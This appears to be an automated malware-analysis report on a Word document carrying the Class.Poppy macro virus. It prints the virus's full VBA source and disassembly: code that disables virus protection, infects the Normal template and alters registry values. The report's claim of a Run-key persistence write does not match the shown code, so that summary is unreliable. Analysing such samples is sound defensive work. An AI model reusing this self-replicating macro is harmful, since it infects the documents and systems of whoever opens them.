MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious OLE document containing legacy WordBasic macros. The AutoOpen macro attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The document body contains unrelated song lyrics, suggesting it is a lure.
Heuristics 5
-
ClamAV: Doc.Trojan.Class-37 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-37
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca Sub AutoOpen() 'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca .replaceline 1, "Sub AutoClose()" 'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17077 bytes |
SHA-256: 7006b9af8fde439f406ccdadf7cb4c464648512376e0c01db1538ace53e60c08 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Private Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Const REG_SZ As Long = 1
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Const HKEY_CURRENT_USER As Long = &H80000001
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Const HKEY_LOCAL_MACHINE As Long = &H80000002
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Sub AutoOpen()
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
On Error GoTo out
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Options.VirusProtection = False
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Options.SaveNormalPrompt = False
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Options.ConfirmConversions = False
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If nt > 70 And ad > 0 Then GoTo out
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If nt < 70 Then
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End If
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
host.codemodule.AddFromFile ("c:\class.sys")
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
With host.codemodule
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
For x = 1 To 16
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.deletelines 1
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Next x
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End With
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If nt < 70 Then
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
With host.codemodule
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.replaceline 1, "Sub AutoClose()"
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.replaceline 91, "Sub ToolsMacro()"
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
For x = 70 To 81
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.deletelines 62
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Next x
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.replaceline 35, " For x = 1 To 4"
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End With
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End If
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If nt < 70 Then
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
u = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, k)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
u = RegSetValueExA(k, "RegisteredOwner", 0, REG_SZ, "VicodinES /CB /TNN", 1)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
u = RegSetValueExA(k, "RegisteredOrganization", 0, REG_SZ, "-(Dr. Diet Mountain Dew)-", 1)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
u = RegCloseKey(k)
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End If
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
With host.codemodule
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
For x = 2 To 104 Step 2
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Next x
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End With
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
out:
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End Sub
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
Sub ViewVBCode()
'Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca
End Sub
' Processing file: /opt/analyzer/scan_staging/7da9411da28c44a89323c34f22e43c9d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9871 bytes
' Line #0:
' FuncDefn (Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long)
' Line #1:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #2:
' FuncDefn (Private Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long)
' Line #3:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #4:
' FuncDefn (Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long)
' Line #5:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #6:
' Dim (Const)
' LitDI2 0x0001
' VarDefn REG_SZ (As Long)
' Line #7:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #8:
' Dim (Const)
' LitHI4 0x0001 0x8000
' VarDefn HKEY_CURRENT_USER (As Long)
' Line #9:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #10:
' Dim (Const)
' LitHI4 0x0002 0x8000
' VarDefn HKEY_LOCAL_MACHINE (As Long)
' Line #11:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #12:
' FuncDefn (Sub AutoOpen())
' Line #13:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #14:
' OnError out
' Line #15:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #16:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #17:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #18:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #19:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #20:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #21:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #22:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St ad
' Line #23:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #24:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St nt
' Line #25:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #26:
' Ld nt
' LitDI2 0x0046
' Gt
' Ld ad
' LitDI2 0x0000
' Gt
' And
' If
' BoSImplicit
' GoTo out
' EndIf
' Line #27:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #28:
' Ld nt
' LitDI2 0x0046
' Lt
' IfBlock
' Line #29:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #30:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' Line #31:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #32:
' Ld host
' MemLd New
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemSt New
' Line #33:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #34:
' LitStr 0x000C "c:\class.sys"
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0001
' Line #35:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #36:
' EndIfBlock
' Line #37:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #38:
' Ld ad
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' EndIf
' Line #39:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #40:
' Ld Now
' ArgsLd Day 0x0001
' LitDI2 0x000E
' Eq
' Ld Now
' ArgsLd Month 0x0001
' LitDI2 0x0005
' Gt
' And
' If
' BoSImplicit
' LitStr 0x0008 "I Think "
' Ld Application
' MemLd UserName
' Concat
' LitStr 0x0016 " is a big stupid jerk!"
' Concat
' LitDI2 0x0000
' LitStr 0x000B "Class.Poppy"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #41:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #42:
' LitStr 0x000C "c:\class.sys"
' Paren
' Ld host
' MemLd codemodule
' ArgsMemCall AddFromFile 0x0001
' Line #43:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #44:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #45:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #46:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0010
' For
' Line #47:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #48:
' LitDI2 0x0001
' ArgsMemCallWith deletelines 0x0001
' Line #49:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #50:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #51:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #52:
' EndWith
' Line #53:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #54:
' Ld nt
' LitDI2 0x0046
' Lt
' IfBlock
' Line #55:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #56:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #57:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #58:
' LitDI2 0x0001
' LitStr 0x000F "Sub AutoClose()"
' ArgsMemCallWith replaceline 0x0002
' Line #59:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #60:
' LitDI2 0x005B
' LitStr 0x0010 "Sub ToolsMacro()"
' ArgsMemCallWith replaceline 0x0002
' Line #61:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #62:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0046
' LitDI2 0x0051
' For
' Line #63:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #64:
' LitDI2 0x003E
' ArgsMemCallWith deletelines 0x0001
' Line #65:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #66:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #67:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #68:
' LitDI2 0x0023
' LitStr 0x0012 " For x = 1 To 4"
' ArgsMemCallWith replaceline 0x0002
' Line #69:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #70:
' EndWith
' Line #71:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #72:
' EndIfBlock
' Line #73:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #74:
' Ld nt
' LitDI2 0x0046
' Lt
' IfBlock
' Line #75:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #76:
' Ld HKEY_LOCAL_MACHINE
' LitStr 0x0029 "Software\Microsoft\Windows\CurrentVersion"
' LitDI2 0x0000
' Ld KEY_ALL_ACCESS
' Ld k
' ArgsLd RegOpenKeyExA 0x0005
' St u
' Line #77:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #78:
' Ld k
' LitStr 0x000F "RegisteredOwner"
' LitDI2 0x0000
' Ld REG_SZ
' LitStr 0x0012 "VicodinES /CB /TNN"
' LitDI2 0x0001
' ArgsLd RegSetValueExA 0x0006
' St u
' Line #79:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #80:
' Ld k
' LitStr 0x0016 "RegisteredOrganization"
' LitDI2 0x0000
' Ld REG_SZ
' LitStr 0x0019 "-(Dr. Diet Mountain Dew)-"
' LitDI2 0x0001
' ArgsLd RegSetValueExA 0x0006
' St u
' Line #81:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #82:
' Ld k
' ArgsLd RegCloseKey 0x0001
' St u
' Line #83:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #84:
' EndIfBlock
' Line #85:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #86:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #87:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #88:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x0068
' LitDI2 0x0002
' ForStep
' Line #89:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #90:
' Ld x
' LitStr 0x0001 "'"
' Ld Application
' MemLd UserName
' Concat
' Ld Now
' Concat
' Ld Application
' MemLd ActivePrinter
' Concat
' Ld Application
' MemLd ActiveWindow
' Concat
' ArgsMemCallWith replaceline 0x0002
' Line #91:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #92:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #93:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #94:
' EndWith
' Line #95:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #96:
' Label out
' Line #97:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #98:
' Ld nt
' LitDI2 0x0046
' Gt
' Ld ad
' LitDI2 0x0000
' Eq
' And
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' EndIf
' Line #99:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #100:
' EndSub
' Line #101:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #102:
' FuncDefn (Sub ViewVBCode())
' Line #103:
' QuoteRem 0x0000 0x003D "Ismerai08.08.01 20:37:46HP DeskJet 850C on LPT1:lagarzablanca"
' Line #104:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.